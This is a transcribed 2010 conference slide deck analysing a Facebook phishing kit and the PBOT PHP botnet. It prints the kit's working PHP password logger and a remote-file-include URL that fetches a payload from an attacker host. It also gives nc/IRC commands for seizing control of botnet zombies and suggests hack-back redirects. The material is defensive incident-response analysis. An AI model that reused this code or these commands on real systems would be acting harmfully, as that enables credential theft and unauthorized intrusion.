D1T2 - Laurent Oudot - Analyzing Massive Web Attacks

Transcription

www.tehtri-security.com
HITBSecConf Kuala Lumpur 2010
© TEHTRI-Security
1
Speaker
  Laurent OUDOT
–  Founder & CEO of TEHTRI-Security (2010)
–  Senior Security Expert
•  When ? 15 years of IT Security
•  What ? Hardening, pentests...
•  Where ? On networks and systems of highly sensitive places:
French Nuclear Warhead Program, United Nations, French Ministry of Defense…
–  Research on defensive & offensive technologies
•  Past: Member of the team RstAck & of the Steering Committee of the
Honeynet Research Alliance...
•  Frequent presenter and instructor at computer security and
academic conferences like Cansecwest, Pacsec, BlackHat
USA-Asia-Europe, HITB Dubai-Amsterdam, US DoD/US DoE,
Defcon, Hope, Honeynet, PH-Neutral, Hack.LU
•  Contributor to several research papers for SecurityFocus,
MISC Magazine, IEEE, etc.
© TEHTRI-Security
2
About TEHTRI-Security
  Company created in April 2010
  Cutting-edge technologies
–  Advanced & Technical Consulting
–  Penetration Tests / Audits…
–  Fighting Information Leaks, Counter-Intelligence…
  Worldwide: Conferences, Training, Consulting
–  Canada, Lebanon, United Arab Emirates, Singapore,
Netherlands, China, Malaysia, France...
  Around 30 public security advisories (6 months)
  International Press / Media
© TEHTRI-Security
3
Introduction
  Goal:
Analyze recent web attacks that targeted a huge
number of people or servers
- End-users
- Web servers
Find & propose innovative solutions
  Target audience:
–  White hats, people who fight Cybercrime, Business
Intelligence & Information Warfare
  Notice:
–  Legal Issues: we remind you to carefully respect the
laws in your country before applying some techniques
shown in this presentation (striking back, etc).
© TEHTRI-Security
4
Plan
1 – About the Attacks
2 – Finding Counter-Measures
3 – Real Life Examples
© TEHTRI-Security
5
Let’s have a look at some of those threats
1. ABOUT THE ATTACKS
© TEHTRI-Security
6
Targeting the internet end-users
  Simple example of action
  Phase 1: Compromise a web server and
add an evil payload on it
–  Client-side attack (exploit kit)
•  Goal: compromise workstations
–  Pharming (password/data recorder)
•  Goal: steal sensitive data (credit card, passwd…)
  Phase 2: Invite victims
–  Pown servers and send emails to tons of
end users (future potential victims)
–  Wait for them to connect & get trapped
© TEHTRI-Security
7
Targeting random web servers
  Phase 1: Identify a vector of intrusion that
could be used against multiple servers
during an offensive campaign
–  E.g.: Easy Remote File Include against a widely
spread web application
  Phase 2: Compromise servers to launch
the massive attack from there
–  E.g.: Target random servers or use Search
Engines to find targets
  Phase 3: Wait for servers to be
compromised and abuse them
–  E.g.: Create a Botnet containing web servers,
and use them to start evil activities (DDOS…)
© TEHTRI-Security
8
Hiding such evil activities
  Automatic & standalone tools and methods
that attack & spread themselves directly
–  Kind of evil cyber life that works alone to
compromise servers, etc
  Multiple bounces
–  They have access to many compromised
servers which allows them to bounce and then
sometimes hide their addresses, etc
  Timeline
–  “Quick Wins”
–  Short period of attacks but multiple attacks
© TEHTRI-Security
9
2. FINDING COUNTERMEASURES
© TEHTRI-Security
10
Finding Counter-Measures
  To protect against such massive web attacks,
we need to improve some fields
  Detection
–  Improving web based intrusion detection
  Protection/Containment
–  Improving hardening of web servers
  Active Response
–  Identify the attackers,
–  Identify the human targeted,
–  Counter-attack…
  Internet contains millions of web sites that can
be compromised easily
–  Such massive web attacks will still exist for a while
© TEHTRI-Security
11
Let’s have a look at some sources stolen to some web
attackers
LIVE REVIEW OF EVIL
SOURCE CODE
© TEHTRI-Security
12
And now let’s have a look at two major threats
3.1 will focus on pharming against social networks
3.2 will focus on botnet with web sites included as zombies
3. REAL LIFE EXAMPLES
© TEHTRI-Security
13
Here is an example about how to handle an unknown
pharming attempt. The example will focus on a real attack
that happened in 2009, against Facebook.
3.1 PHARMING ATTACK
AGAINST FACEBOOK
© TEHTRI-Security
14
Pharming against Facebook
  Phishing attack with tons of emails sent
asking to login facebook
  Fake facebook portal recording emails
and passwords
© TEHTRI-Security
15
Fake Facebook Page : HTML sent
  Here is the fake Facebook login page that was hosted on some
compromised web servers
  This HTML (javascript) code was sent to the incoming clients,
thinking they were on Facebook
<script>!
!
</script>!
FAKE FACEBOOK LOGIN PAGE (SOURCE) HITBSecConf Kuala Lumpur 2010
© TEHTRI-Security
16
This javascript generates HTML
  It contains the fake login FORM
  This FORM sends the HTTP Client to « write.php » which is
hosted on the same compromized computer
!<form method="GET" action="write.php" id="https://
login.facebook.com/login.php?login_attempt=1">!
  When a victim tries to log in, here is the GET request sent
to « write.php »
!http://compromizedhost.tld/fake-facebook/write.php?
charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C
%C2%B4%2C%E6%B0%B4%2C%D0%94%2C
%D0%84&fb_dtsg=&version=1.0&return_session=0&charset
_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C
%E6%B0%B4%2C%D0%94%2C
%D0%84&[email protected]&pass=oldsecret!
© TEHTRI-Security
17
Behavior of “write.php”
  Once someone sends his login/password, he is redirected
to another web page, which is the real Facebook page
  The end used, will then have to login (again ?) on the real
facebook page
–  This is not really stealth, but many end users just thought
there were an temporary error
  HTTP packet sent by « write.php »
HTTP/1.1 302 Found!
Date: Tue, 28 April 2009 07:13:12 GMT!
Server: Apache/2.0 (Unix) PHP/4.3!
X-Powered-By: PHP/4.3!
Location: http://www.facebook.com/login.php!
Content-Length: 0!
Keep-Alive: timeout=5, max=100!
Connection: Keep-Alive!
Content-Type: text/html!
© TEHTRI-Security
18
Was it stealth on Facebook’s side ?
  The fake Facebook webpage contained
references to resources (images,
javascript...) hosted on facebook
infrastructure, like:
–  http://static.ak.fbcdn.net/favicon.ico?8:132011!
–  http://b.static.ak.fbcdn.net/rsrc.php/zEDCY/
lpkg/hm02tea0/en_US/141/160771/js/
40m30takmjqccw4c.pkg.js!
–  ...
  Thanks to the REFERER sent by (most)
Web clients, it was possible to get the
URL of the pharming kit against FB
© TEHTRI-Security
19
What was possible then ?
  Contact the webmasters / admins of the
compromized sites used to host the evil
facebook fishing script
  And ask them to send the files involved
for further analysis
–  3 files found
•  index.htm  Fake Login Web Page
•  write.php  Password recorder+302 redirector
•  passes.txt  ALL THE STOLEN PASSWORDS
© TEHTRI-Security
20
Analyzing “write.php”
  PHP Script that records any GET arguments (cleartext output) !
<?php!
header("Location: http://www.facebook.com/login.php");!
$handle = fopen("passes.txt", "a");!
foreach($_GET as $variable => $value)!
{!
fwrite($handle, $variable);!
fwrite($handle, "=");!
fwrite($handle, $value);!
fwrite($handle, "\r\n");!
}!
fwrite($handle, "\r\n");!
fclose($handle);!
exit();!
?>!
© TEHTRI-Security
21
So, what contained “passes.txt” ?
  It contained the email / passwords of
any end users who thought it was a real
email from Facebook...
  Example
...!
charset_test=€,´,€,´,水,Д,Є !
fb_dtsg= !
version=1.0 !
return_session=0 !
[email protected]!
pass=oldsecret!
...!
© TEHTRI-Security
22
What could be done then ?
  Containment
–  Any email address compromised could be “blocked”,
and the end-user could be contacted, by asking for a
new password to be set
  Track the attackers
–  The webmasters / admins of the compromised web
server that hosted the pharming script, could help with
the logs of the site
–  Good questions:
•  Who asked for “passes.txt” ? IP address of attackers
•  When ? Look at the different dates
•  How many Facebook end-users were compromised…?
–  Size of bytes sent ?
•  A.B.C.D - - [28/Apr/2009:17:07:47 +0200] "GET /..../
passes.txt HTTP/1.1" 200 194 "-" "Mozilla/5.0 (X11; U; Linux
i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
•  Here we have to look at the users included in first 194 bytes
© TEHTRI-Security
23
Innovative solution?
  Tiny-Offensive solution for FB if they don’t have the
help of the compromised hoster
–  For each resource (pictures) asked by clients coming
from the compromised host (see REFERER) just send
big fake pictures in RED with Security Notice
  Semi-Offensive solution that could be tried by
Facebook (Trap !)
– 
– 
– 
– 
– 
– 
“Handle” the accounts compromised on FB
Add fake accounts on FB
Log anything related to those accounts on FB
Add those accounts in “passes.txt”
Wait for the attackers to read that file
Each time they connect on the fake accounts, it’s more
time to gather more info about them (law enforcement
possibilities, etc)
© TEHTRI-Security
24
More innovative solution?
  Example of an offensive solution that could be tried by FB:
–  Change “passes.txt” so that the attackers are sent to another
page for counter-attack plans (intrusion on attackers’ comp
or identify them)
$ rm passes.txt; cat > passes.txt.php !
<?php header("Location: http://malicious-site/anti-attackers/"); ?>!
–  Samples for such a session from an attacker
GET /malware/fb/passes.txt HTTP/1.1!
Host: compromised-hosting-server!
User-Agent: Mozilla/5.0 (X11; U; Linux; en-US) Firefox/3.6!
Accept: text/html,application/xhtml+xml,application/xml!
HTTP/1.1 302 Found!
Server: Apache/2.2.14 (Unix) OpenSSL/0.9.8l DAV/2 PHP/5.3.1!
Location: http://malicious-site/anti-attackers/!
© TEHTRI-Security
25
Here is an example of a technique that creates a botnet
full of web servers…
3.2 WEB BASED BOTNET
© TEHTRI-Security
26
Adding Web Sites into a Botnet
MASSIVE ATTACKS COMMAND & CONTROL CHANNEL MASSIVE
ORDERS Web sites HITBSecConf Kuala Lumpur 2010
FINAL ACTION (e.g.: DDOS) www.tehtri-security.com
© TEHTRI-Security
27
PBOT: The PHP Botnet
  RFI Attackers
–  Automatic Web Scan
against PHP
  If a PHP site is
vulnerable to a RFI,
the web server is
turned into a
zombie with PBOT
  IRC Command &
Control
–  Login / Password
–  Many actions
proposed
© TEHTRI-Security
28
Hunting PBOT, PHP BotNet
  Phase 1: Identify a PBOT Attack
–  Analyze your logs (web server)
–  Find RFI (Remote File Include) tests
and check if it’s a PBOT
http://www.yoursite.tld/yourscript.php?
yourargument1=http://ownedbox.tld/
evilrepository/payload.txt?!
  Phase 2: Analyze source code
and retrieve sensitive information
–  IRC Server, Port, Password,
Channel...
–  Version of PBOT, Protocol used (e.g.
over IRCII PRIVMSG), Internal
Password...
  Phase 3: Counter-Attack
–  Infiltrate the Botnet
–  Identify the compromized
computers (to alert the CERTs,
Administrators, host owners, etc)
–  Kill Pbot
  Sample from the source code
class pBot !
{ !
var $config = array(!
!"server"=>"a.b.c.d", !
!"port"=>6669, !
!"pass"=>"", //senha do server!
!"prefix"=>"owned|", !
"maxrand"=>8, !
!"chan"=>"#pbotchannel", !
!"key"=>"oxi", //senha do canal!
!"modes"=>"+p", !
!"password"=>"l33tP4sS", //senha do bot!
!"trigger"=>".", !
!"hostauth"=>"*" // * for any hostname !
); !
© TEHTRI-Security
29
Infiltrate the Botnet
  How to connect to the remote IRC Server
–  Use the native PHP code from Pbot (which become a
PHP Client Honeypot) or modify it,
–  Or sometimes use an IRC Client or by hand
  Example by hand (safe)
–  Connect
•  nc -nvv a.b.c.d 6669
–  Send your yousername + nickname
•  USER ownedolsyezun 127.0.0.1 localhost :ownedolsyezun
•  NICK owned|34944893
–  If you get a PING, reply with the PONG
•  PONG :xxxxxxxx
–  Join the channel of the Zombies...
•  JOIN #pbotchannel oxi
–  Become administrator of any zombie of this Botnet
•  PRIVMSG #pbotchannel :.user l33tP4sS
© TEHTRI-Security
30
Identify who is infected
  Use their command & control channel
–  PRIVMSG #pbotchannel :.info
:owned|[email protected] PRIVMSG #pbotchannel :[Vuln!]: http://www.xxxxx/index.php?
_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid
%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??]
!
  Nickname, username of the Zombie (Random)
  :owned|86540828!~ownedjzytf
  IP, Hostname of the zombie
  x.a.b.c
  PHP Script that is vulnerable to an RFI!
  http://www.xxxxx/index.php!
  PHP Script that is vulnerable to an RFI!
 
_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid
%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??
  PBOT Repository that was used for this infection
 
http://a.b.c.d/evil??!
© TEHTRI-Security
31
Kill the BotNet
  How to ask all the bot on the channel to die ?
case "die": !
!
!
// MESSAGE USED ON THE COMMAND & CONTROL CENTER !
!$this->send("QUIT :MORRI! comando por $nick"); // OUTPUT SENT ON THE CHANNEL!
!fclose($this->conn); !// CLOSE THE FILE DESCRIPTOR (SOCKET) FOR THIS SESSION !
!exit;!
!
!
!
// AND EXIT !
  Broadcast this command to any bot in the channel
–  PRIVMSG #pbotchannel :.die
  Stealth alternative: direct PRIVMSG to any zombie...
  Output retrieved through such a command
–  You see all the different zombies dying...!
:owned|[email protected] QUIT :Read error: EOF from client!
:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893!
...!
© TEHTRI-Security
32
Let’s have a look at some sources stolen to some web
attackers
LIVE REVIEW OF EVIL
SOURCE CODE
© TEHTRI-Security
33
CONCLUSION
© TEHTRI-Security
34
Conclusion
  Massive web attacks
–  It’s simple
–  It’s cheap
–  It happens now
–  But the IT Security world don’t talk too much
about those threats (not enough technical ?)
•  They prefer to focus on threats that happen in laboratories
(super futuristic exploits, etc)
  Improve monitoring & Take a look at your logs
–  Track down the attackers
–  Steal their tools
–  Share your findings
–  Improve Internet Security
  “Life is short, Play hard”
© TEHTRI-Security
35
This is not a game.
Take care. Thanks.
Contact TEHTRI-Security
When you catch a web malware
When you need technical assistance
Meet TEHTRI-Security
Ask for our trainings
web (at) tehtri-security (dot) com
© TEHTRI-Security
36

D1T2 - Laurent Oudot - Analyzing Massive Web Attacks

Transcription

Similar documents

Financial Growth Summit Kuala Lumpur 2014

C ompany C redentials 2012

p2p finalists info sheet

SMIDEX

immediate press release 11th aug`2014

Suria KLCC - Malaysian Open, Kuala Lumpur

- apricot

(Floor Map) Local Tour Route Map of Kuala Lumpur

to fact sheet

to enjoy tantalising dining privileges at Shangri